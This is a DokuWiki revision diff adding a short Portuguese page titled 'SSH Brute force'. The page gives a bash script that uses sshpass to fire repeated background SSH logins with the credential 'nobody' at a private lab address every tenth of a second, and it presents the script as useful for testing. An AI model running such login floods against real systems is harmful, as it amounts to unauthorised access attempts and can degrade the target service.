User Tools

Site Tools


wiki:scripts:sshpass.sh

Differences

This shows you the differences between two versions of the page.

Link to this comparison view

wiki:scripts:sshpass.sh [2022/09/05 11:52] – created cleitonwiki:scripts:sshpass.sh [2022/09/05 11:54] (current) cleiton
Line 1: Line 1:
-x+====== SSH Brute force ====== 
 + 
 +O script faz varias tentativas de login, útil para testes. 
 + 
 +  # apt -y install sshpass 
 +  # vi sshbrute.sh 
 + 
 +<file php sshbrute.sh> 
 +#!/usr/bin/env bash 
 + 
 +while true; do 
 + sshpass -p nobody ssh -n -T -o StrictHostKeyChecking=no nobody@192.168.68.11 & 
 + sleep 0.1 
 +done 
 +</file> 
wiki/scripts/sshpass.sh.1662378752.txt.gz · Last modified: 2022/09/05 11:52 by cleiton

Donate Powered by PHP Valid HTML5 Valid CSS Driven by DokuWiki